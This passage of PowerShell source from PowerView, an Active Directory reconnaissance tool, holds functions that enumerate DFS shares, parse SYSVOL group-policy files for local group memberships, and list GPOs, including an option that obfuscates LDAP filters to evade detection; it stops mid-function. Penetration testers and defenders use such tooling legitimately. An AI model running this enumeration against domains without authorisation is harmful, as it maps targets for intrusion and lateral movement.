$reserved_blob_size_end + 1\n                        $reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1\n                        $reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end]\n                        $referral_ttl_start = $reserved_blob_end + 1\n                        $referral_ttl_end = $referral_ttl_start + 3\n                        $referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0)\n\n                        #Parse DFSTargetListBlob\n                        $target_count_start = 0\n                        $target_count_end = $target_count_start + 3\n                        $target_count = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0)\n                        $t_offset = $target_count_end + 1\n\n                        for($j=1; $j -le $target_count; $j++){\n                            $target_entry_size_start = $t_offset\n                            $target_entry_size_end = $target_entry_size_start + 3\n                            $target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0)\n                            $target_time_stamp_start = $target_entry_size_end + 1\n                            $target_time_stamp_end = $target_time_stamp_start + 7\n                            # FILETIME again or special if priority rank and priority class 0\n                            $target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end]\n                            $target_state_start = $target_time_stamp_end + 1\n                            $target_state_end = $target_state_start + 3\n                            $target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0)\n\n                            $target_type_start = $target_state_end + 1\n                            $target_type_end = $target_type_start + 3\n                            $target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0)\n\n                            $server_name_size_start = $target_type_end + 1\n                            $server_name_size_end = $server_name_size_start + 1\n                            $server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0)\n\n                            $server_name_start = $server_name_size_end + 1\n                            $server_name_end = $server_name_start + $server_name_size - 1\n                            $server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end])\n\n                            $share_name_size_start = $server_name_end + 1\n                            $share_name_size_end = $share_name_size_start + 1\n                            $share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0)\n                            $share_name_start = $share_name_size_end + 1\n                            $share_name_end = $share_name_start + $share_name_size - 1\n                            $share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end])\n\n                            $target_list += \"\\\\$server_name\\$share_name\"\n                            $t_offset = $share_name_end + 1\n                        }\n                    }\n                }\n                $offset = $blob_data_end + 1\n                $dfs_pkt_properties = @{\n                    'Name' = $blob_name\n                    'Prefix' = $prefix\n                    'TargetList' = $target_list\n                }\n                $object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties\n                $prefix = $Null\n                $blob_name = $Null\n                $target_list = $Null\n            }\n\n            $servers = @()\n            $object_list | ForEach-Object {\n                if ($_.TargetList) {\n                    $_.TargetList | ForEach-Object {\n                        $servers += $_.split('\\')[2]\n                    }\n                }\n            }\n\n            $servers\n        }\n\n        function Get-DomainDFSShareV1 {\n            [CmdletBinding()]\n            Param(\n                [String]\n                $Domain,\n\n                [String]\n                $SearchBase,\n\n                [String]\n                $Server,\n\n                [String]\n                $SearchScope = 'Subtree',\n\n                [Int]\n                $ResultPageSize = 200,\n\n                [Int]\n                $ServerTimeLimit,\n\n                [Switch]\n                $Tombstone,\n\n                [Management.Automation.PSCredential]\n                [Management.Automation.CredentialAttribute()]\n                $Credential = [Management.Automation.PSCredential]::Empty\n            )\n\n            $DFSsearcher = Get-DomainSearcher @PSBoundParameters\n\n            if ($DFSsearcher) {\n                $DFSshares = @()\n                $DFSsearcher.filter = '(&(objectClass=fTDfs))'\n\n                try {\n                    $Results = $DFSSearcher.FindAll()\n                    $Results | Where-Object {$_} | ForEach-Object {\n                        $Properties = $_.Properties\n                        $RemoteNames = $Properties.remoteservername\n                        $Pkt = $Properties.pkt\n\n                        $DFSshares += $RemoteNames | ForEach-Object {\n                            try {\n                                if ( $_.Contains('\\') ) {\n                                    New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split('\\')[2]}\n                                }\n                            }\n                            catch {\n                                Write-Verbose \"[Get-DomainDFSShare] Get-DomainDFSShareV1 error in parsing DFS share : $_\"\n                            }\n                        }\n                    }\n                    if ($Results) {\n                        try { $Results.dispose() }\n                        catch {\n                            Write-Verbose \"[Get-DomainDFSShare] Get-DomainDFSShareV1 error disposing of the Results object: $_\"\n                        }\n                    }\n                    $DFSSearcher.dispose()\n\n                    if ($pkt -and $pkt[0]) {\n                        Parse-Pkt $pkt[0] | ForEach-Object {\n                            # If a folder doesn't have a redirection it will have a target like\n                            # \\\\null\\TestNameSpace\\folder\\.DFSFolderLink so we do actually want to match\n                            # on 'null' rather than $Null\n                            if ($_ -ne 'null') {\n                                New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_}\n                            }\n                        }\n                    }\n                }\n                catch {\n                    Write-Warning \"[Get-DomainDFSShare] Get-DomainDFSShareV1 error : $_\"\n                }\n                $DFSshares | Sort-Object -Unique -Property 'RemoteServerName'\n            }\n        }\n\n        function Get-DomainDFSShareV2 {\n            [CmdletBinding()]\n            Param(\n                [String]\n                $Domain,\n\n                [String]\n                $SearchBase,\n\n                [String]\n                $Server,\n\n                [String]\n                $SearchScope = 'Subtree',\n\n                [Int]\n                $ResultPageSize = 200,\n\n                [Int]\n                $ServerTimeLimit,\n\n                [Switch]\n                $Tombstone,\n\n                [Management.Automation.PSCredential]\n                [Management.Automation.CredentialAttribute()]\n                $Credential = [Management.Automation.PSCredential]::Empty\n            )\n\n            $DFSsearcher = Get-DomainSearcher @PSBoundParameters\n\n            if ($DFSsearcher) {\n                $DFSshares = @()\n                $DFSsearcher.filter = '(&(objectClass=msDFS-Linkv2))'\n                $Null = $DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2'))\n\n                try {\n                    $Results = $DFSSearcher.FindAll()\n                    $Results | Where-Object {$_} | ForEach-Object {\n                        $Properties = $_.Properties\n                        $target_list = $Properties.'msdfs-targetlistv2'[0]\n                        $xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)])\n                        $DFSshares += $xml.targets.ChildNodes | ForEach-Object {\n                            try {\n                                $Target = $_.InnerText\n                                if ( $Target.Contains('\\') ) {\n                                    $DFSroot = $Target.split('\\')[3]\n                                    $ShareName = $Properties.'msdfs-linkpathv2'[0]\n                                    New-Object -TypeName PSObject -Property @{'Name'=\"$DFSroot$ShareName\";'RemoteServerName'=$Target.split('\\')[2]}\n                                }\n                            }\n                            catch {\n                                Write-Verbose \"[Get-DomainDFSShare] Get-DomainDFSShareV2 error in parsing target : $_\"\n                            }\n                        }\n                    }\n                    if ($Results) {\n                        try { $Results.dispose() }\n                        catch {\n                            Write-Verbose \"[Get-DomainDFSShare] Error disposing of the Results object: $_\"\n                        }\n                    }\n                    $DFSSearcher.dispose()\n                }\n                catch {\n                    Write-Warning \"[Get-DomainDFSShare] Get-DomainDFSShareV2 error : $_\"\n                }\n                $DFSshares | Sort-Object -Unique -Property 'RemoteServerName'\n            }\n        }\n    }\n\n    PROCESS {\n        $DFSshares = @()\n\n        if ($PSBoundParameters['Domain']) {\n            ForEach ($TargetDomain in $Domain) {\n                $SearcherArguments['Domain'] = $TargetDomain\n                if ($Version -match 'all|1') {\n                    $DFSshares += Get-DomainDFSShareV1 @SearcherArguments\n                }\n                if ($Version -match 'all|2') {\n                    $DFSshares += Get-DomainDFSShareV2 @SearcherArguments\n                }\n            }\n        }\n        else {\n            if ($Version -match 'all|1') {\n                $DFSshares += Get-DomainDFSShareV1 @SearcherArguments\n            }\n            if ($Version -match 'all|2') {\n                $DFSshares += Get-DomainDFSShareV2 @SearcherArguments\n            }\n        }\n\n        $DFSshares | Sort-Object -Property ('RemoteServerName','Name') -Unique\n    }\n}\n\n\n########################################################\n#\n# GPO related functions.\n#\n########################################################\n\nfunction Get-GptTmpl {\n<#\n.SYNOPSIS\n\nHelper to parse a GptTmpl.inf policy file path into a hashtable.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Add-RemoteConnection, Remove-RemoteConnection, Get-IniContent  \n\n.DESCRIPTION\n\nParses a GptTmpl.inf into a custom hashtable using Get-IniContent. If a\nGPO object is passed, GPOPATH\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf\nis constructed and assumed to be the parse target. If -Credential is passed,\nAdd-RemoteConnection is used to mount \\\\TARGET\\SYSVOL with the specified creds,\nthe files are parsed, and the connection is destroyed later with Remove-RemoteConnection.\n\n.PARAMETER GptTmplPath\n\nSpecifies the GptTmpl.inf file path name to parse.\n\n.PARAMETER OutputObject\n\nSwitch. Output a custom PSObject instead of a hashtable.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system.\n\n.EXAMPLE\n\nGet-GptTmpl -GptTmplPath \"\\\\dev.testlab.local\\sysvol\\dev.testlab.local\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf\"\n\nParse the default domain policy .inf for dev.testlab.local\n\n.EXAMPLE\n\nGet-DomainGPO testing | Get-GptTmpl\n\nParse the GptTmpl.inf policy for the GPO with display name of 'testing'.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-GptTmpl -Credential $Cred -GptTmplPath \"\\\\dev.testlab.local\\sysvol\\dev.testlab.local\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf\"\n\nParse the default domain policy .inf for dev.testlab.local using alternate credentials.\n\n.OUTPUTS\n\nHashtable\n\nOuputs a hashtable representing the parsed GptTmpl.inf file.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([Hashtable])]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('gpcfilesyspath', 'Path')]\n        [String]\n        $GptTmplPath,\n\n        [Switch]\n        $OutputObject,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $MappedPaths = @{}\n    }\n\n    PROCESS {\n        try {\n            if (($GptTmplPath -Match '\\\\\\\\.*\\\\.*') -and ($PSBoundParameters['Credential'])) {\n                $SysVolPath = \"\\\\$((New-Object System.Uri($GptTmplPath)).Host)\\SYSVOL\"\n                if (-not $MappedPaths[$SysVolPath]) {\n                    # map IPC$ to this computer if it's not already\n                    Add-RemoteConnection -Path $SysVolPath -Credential $Credential\n                    $MappedPaths[$SysVolPath] = $True\n                }\n            }\n\n            $TargetGptTmplPath = $GptTmplPath\n            if (-not $TargetGptTmplPath.EndsWith('.inf')) {\n                $TargetGptTmplPath += '\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf'\n            }\n\n            Write-Verbose \"[Get-GptTmpl] Parsing GptTmplPath: $TargetGptTmplPath\"\n\n            if ($PSBoundParameters['OutputObject']) {\n                $Contents = Get-IniContent -Path $TargetGptTmplPath -OutputObject -ErrorAction Stop\n                if ($Contents) {\n                    $Contents | Add-Member Noteproperty 'Path' $TargetGptTmplPath\n                    $Contents\n                }\n            }\n            else {\n                $Contents = Get-IniContent -Path $TargetGptTmplPath -ErrorAction Stop\n                if ($Contents) {\n                    $Contents['Path'] = $TargetGptTmplPath\n                    $Contents\n                }\n            }\n        }\n        catch {\n            Write-Verbose \"[Get-GptTmpl] Error parsing $TargetGptTmplPath : $_\"\n        }\n    }\n\n    END {\n        # remove the SYSVOL mappings\n        $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ }\n    }\n}\n\n\nfunction Get-GroupsXML {\n<#\n.SYNOPSIS\n\nHelper to parse a groups.xml file path into a custom object.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertTo-SID  \n\n.DESCRIPTION\n\nParses a groups.xml into a custom object. If -Credential is passed,\nAdd-RemoteConnection is used to mount \\\\TARGET\\SYSVOL with the specified creds,\nthe files are parsed, and the connection is destroyed later with Remove-RemoteConnection.\n\n.PARAMETER GroupsXMLpath\n\nSpecifies the groups.xml file path name to parse.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system.\n\n.OUTPUTS\n\nPowerView.GroupsXML\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.GroupsXML')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Path')]\n        [String]\n        $GroupsXMLPath,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $MappedPaths = @{}\n    }\n\n    PROCESS {\n        try {\n            if (($GroupsXMLPath -Match '\\\\\\\\.*\\\\.*') -and ($PSBoundParameters['Credential'])) {\n                $SysVolPath = \"\\\\$((New-Object System.Uri($GroupsXMLPath)).Host)\\SYSVOL\"\n                if (-not $MappedPaths[$SysVolPath]) {\n                    # map IPC$ to this computer if it's not already\n                    Add-RemoteConnection -Path $SysVolPath -Credential $Credential\n                    $MappedPaths[$SysVolPath] = $True\n                }\n            }\n\n            [XML]$GroupsXMLcontent = Get-Content -Path $GroupsXMLPath -ErrorAction Stop\n\n            # process all group properties in the XML\n            $GroupsXMLcontent | Select-Xml \"/Groups/Group\" | Select-Object -ExpandProperty node | ForEach-Object {\n\n                $Groupname = $_.Properties.groupName\n\n                # extract the localgroup sid for memberof\n                $GroupSID = $_.Properties.groupSid\n                if (-not $GroupSID) {\n                    if ($Groupname -match 'Administrators') {\n                        $GroupSID = 'S-1-5-32-544'\n                    }\n                    elseif ($Groupname -match 'Remote Desktop') {\n                        $GroupSID = 'S-1-5-32-555'\n                    }\n                    elseif ($Groupname -match 'Guests') {\n                        $GroupSID = 'S-1-5-32-546'\n                    }\n                    else {\n                        if ($PSBoundParameters['Credential']) {\n                            $GroupSID = ConvertTo-SID -ObjectName $Groupname -Credential $Credential\n                        }\n                        else {\n                            $GroupSID = ConvertTo-SID -ObjectName $Groupname\n                        }\n                    }\n                }\n\n                # extract out members added to this group\n                $Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object {\n                    if ($_.sid) { $_.sid }\n                    else { $_.name }\n                }\n\n                if ($Members) {\n                    # extract out any/all filters...I hate you GPP\n                    if ($_.filters) {\n                        $Filters = $_.filters.GetEnumerator() | ForEach-Object {\n                            New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name}\n                        }\n                    }\n                    else {\n                        $Filters = $Null\n                    }\n\n                    if ($Members -isnot [System.Array]) { $Members = @($Members) }\n\n                    $GroupsXML = New-Object PSObject\n                    $GroupsXML | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath\n                    $GroupsXML | Add-Member Noteproperty 'Filters' $Filters\n                    $GroupsXML | Add-Member Noteproperty 'GroupName' $GroupName\n                    $GroupsXML | Add-Member Noteproperty 'GroupSID' $GroupSID\n                    $GroupsXML | Add-Member Noteproperty 'GroupMemberOf' $Null\n                    $GroupsXML | Add-Member Noteproperty 'GroupMembers' $Members\n                    $GroupsXML.PSObject.TypeNames.Insert(0, 'PowerView.GroupsXML')\n                    $GroupsXML\n                }\n            }\n        }\n        catch {\n            Write-Verbose \"[Get-GroupsXML] Error parsing $TargetGroupsXMLPath : $_\"\n        }\n    }\n\n    END {\n        # remove the SYSVOL mappings\n        $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ }\n    }\n}\n\n\nfunction Get-DomainGPO {\n<#\n.SYNOPSIS\n\nReturn all GPOs or specific GPO objects in AD.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty  \n\n.DESCRIPTION\n\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\nLDAP filter based on targeting/filter parameters, and searches for all objects\nmatching the criteria. To only return specific properties, use\n\"-Properties samaccountname,usnchanged,...\". By default, all GPO objects for\nthe current domain are returned. To enumerate all GPOs that are applied to\na particular machine, use -ComputerName X.\n\n.PARAMETER Identity\n\nA display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),\nGUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted.\n\n.PARAMETER ComputerIdentity\n\nReturn all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.).\n\n.PARAMETER UserIdentity\n\nReturn all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.).\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nGet-DomainGPO -Domain testlab.local\n\nReturn all GPOs for the testlab.local domain\n\n.EXAMPLE\n\nGet-DomainGPO -ComputerName windows1.testlab.local\n\nReturns all GPOs applied windows1.testlab.local\n\n.EXAMPLE\n\n\"{F260B76D-55C8-46C5-BEF1-9016DD98E272}\",\"Test GPO\" | Get-DomainGPO\n\nReturn the GPOs with the name of \"{F260B76D-55C8-46C5-BEF1-9016DD98E272}\" and the display\nname of \"Test GPO\"\n\n.EXAMPLE\n\nGet-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainGPO -Credential $Cred\n\n.OUTPUTS\n\nPowerView.GPO\n\nCustom PSObject with translated GPO property fields.\n\nPowerView.GPO.Raw\n\nThe raw DirectoryServices.SearchResult object, if -Raw is enabled.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [OutputType('PowerView.GPO')]\n    [OutputType('PowerView.GPO.Raw')]\n    [CmdletBinding(DefaultParameterSetName = 'None')]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String[]]\n        $Identity,\n\n        [Parameter(ParameterSetName = 'ComputerIdentity')]\n        [Alias('ComputerName')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerIdentity,\n\n        [Parameter(ParameterSetName = 'UserIdentity')]\n        [Alias('UserName')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $UserIdentity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['SSL']) { $SearcherArguments['SSL'] = $SSL }\n        if ($PSBoundParameters['Obfuscate']) {$SearcherArguments['Obfuscate'] = $Obfuscate }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['ComputerIdentity'] -or $PSBoundParameters['UserIdentity']) {\n            $GPOAdsPaths = @()\n            if ($SearcherArguments['Properties']) {\n                $OldProperties = $SearcherArguments['Properties']\n            }\n            $SearcherArguments['Properties'] = 'distinguishedname,dnshostname'\n            $TargetComputerName = $Null\n\n            if ($PSBoundParameters['ComputerIdentity']) {\n                $SearcherArguments['Identity'] = $ComputerIdentity\n                $Computer = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1\n                if(-not $Computer) {\n                    Write-Verbose \"[Get-DomainGPO] Computer '$ComputerIdentity' not found!\"\n                }\n                $ObjectDN = $Computer.distinguishedname\n                $TargetComputerName = $Computer.dnshostname\n            }\n            else {\n                $SearcherArguments['Identity'] = $UserIdentity\n                $User = Get-DomainUser @SearcherArguments -FindOne | Select-Object -First 1\n                if(-not $User) {\n                    Write-Verbose \"[Get-DomainGPO] User '$UserIdentity' not found!\"\n                }\n                $ObjectDN = $User.distinguishedname\n            }\n\n            # extract all OUs the target user/computer is a part of\n            $ObjectOUs = @()\n            $ObjectOUs += $ObjectDN.split(',') | ForEach-Object {\n                if($_.startswith('OU=')) {\n                    $ObjectDN.SubString($ObjectDN.IndexOf(\"$($_),\"))\n                }\n            }\n            Write-Verbose \"[Get-DomainGPO] object OUs: $ObjectOUs\"\n\n            if ($ObjectOUs) {\n                # find all the GPOs linked to the user/computer's OUs\n                $SearcherArguments.Remove('Properties')\n                $InheritanceDisabled = $False\n                ForEach($ObjectOU in $ObjectOUs) {\n                    $SearcherArguments['Identity'] = $ObjectOU\n                    $GPOAdsPaths += Get-DomainOU @SearcherArguments | ForEach-Object {\n                        # extract any GPO links for this particular OU the computer is a part of\n                        if ($_.gplink) {\n                            $_.gplink.split('][') | ForEach-Object {\n                                if ($_.startswith('LDAP')) {\n                                    $Parts = $_.split(';')\n                                    $GpoDN = $Parts[0]\n                                    $Enforced = $Parts[1]\n                                 if ($InheritanceDisabled) {\n                                        # if inheritance has already been disabled and this GPO is set as \"enforced\"\n                                        #   then add it, otherwise ignore it\n                                        if ($Enforced -eq 2) {\n                                            $GpoDN\n                                        }\n                                    }\n                                    else {\n                                        # inheritance not marked as disabled yet\n                                        $GpoDN\n                                    }\n                                }\n                            }\n                        }\n\n                        # if this OU has GPO inheritence disabled, break so additional OUs aren't processed\n                        if ($_.gpoptions -eq 1) {\n                            $InheritanceDisabled = $True\n                        }\n                    }\n                }\n            }\n\n            if ($TargetComputerName) {\n                # find all the GPOs linked to the computer's site\n                $ComputerSite = (Get-NetComputerSiteName -ComputerName $TargetComputerName).SiteName\n                if($ComputerSite -and ($ComputerSite -notlike 'Error*')) {\n                    $SearcherArguments['Identity'] = $ComputerSite\n                    $GPOAdsPaths += Get-DomainSite @SearcherArguments | ForEach-Object {\n                        if($_.gplink) {\n                            # extract any GPO links for this particular site the computer is a part of\n                            $_.gplink.split('][') | ForEach-Object {\n                                if ($_.startswith('LDAP')) {\n                                    $_.split(';')[0]\n                                }\n                            }\n                        }\n                    }\n                }\n            }\n\n            # find any GPOs linked to the user/computer's domain\n            $ObjectDomainDN = $ObjectDN.SubString($ObjectDN.IndexOf('DC='))\n            $SearcherArguments.Remove('Identity')\n            $SearcherArguments.Remove('Properties')\n            $SearcherArguments['LDAPFilter'] = \"(objectclass=domain)(distinguishedname=$ObjectDomainDN)\"\n            $GPOAdsPaths += Get-DomainObject @SearcherArguments | ForEach-Object {\n                if($_.gplink) {\n                    # extract any GPO links for this particular domain the computer is a part of\n                    $_.gplink.split('][') | ForEach-Object {\n                        if ($_.startswith('LDAP')) {\n                            $_.split(';')[0]\n                        }\n                    }\n                }\n            }\n            Write-Verbose \"[Get-DomainGPO] GPOAdsPaths: $GPOAdsPaths\"\n\n            # restore the old properites to return, if set\n            if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties }\n            else { $SearcherArguments.Remove('Properties') }\n            $SearcherArguments.Remove('Identity')\n\n            $GPOAdsPaths | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object {\n                # use the gplink as an ADS path to enumerate all GPOs for the computer\n                $SearcherArguments['SearchBase'] = $_\n                $SearcherArguments['LDAPFilter'] = \"(objectCategory=groupPolicyContainer)\"\n                Get-DomainObject @SearcherArguments | ForEach-Object {\n                    if ($PSBoundParameters['Raw']) {\n                        $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw')\n                    }\n                    else {\n                        $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO')\n                    }\n                    $_\n                }\n            }\n        }\n        else {\n            $IdentityFilter = ''\n            $Filter = ''\n            $Identity | Where-Object {$_} | ForEach-Object {\n                $IdentityInstance = $_.Replace('(', '\\28').Replace(')', '\\29')\n                if ($IdentityInstance -match 'LDAP://|^CN=.*') {\n                    $IdentityFilter += \"(distinguishedname=$IdentityInstance)\"\n                    if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {\n                        # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname\n                        #   and rebuild the domain searcher\n                        $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                        Write-Verbose \"[Get-DomainGPO] Extracted domain '$IdentityDomain' from '$IdentityInstance'\"\n                        $SearcherArguments['Domain'] = $IdentityDomain\n                        $GPOSearcher = Get-DomainSearcher @SearcherArguments\n                        if (-not $GPOSearcher) {\n                            Write-Warning \"[Get-DomainGPO] Unable to retrieve domain searcher for '$IdentityDomain'\"\n                        }\n                    }\n                }\n                elseif ($IdentityInstance -match '{.*}') {\n                    $IdentityFilter += \"(name=$IdentityInstance)\"\n                }\n                else {\n                    try {\n                        $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\\$1'\n                        $IdentityFilter += \"(objectguid=$GuidByteString)\"\n                    }\n                    catch {\n                        $IdentityFilter += \"(displayname=$IdentityInstance)\"\n                    }\n                }\n            }\n            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n                $Filter += \"(|$IdentityFilter)\"\n            }\n\n            if ($PSBoundParameters['LDAPFilter']) {\n                Write-Verbose \"[Get-DomainGPO] Using additional LDAP filter: $LDAPFilter\"\n                $Filter += \"$LDAPFilter\"\n            }\n\n            $Filter = 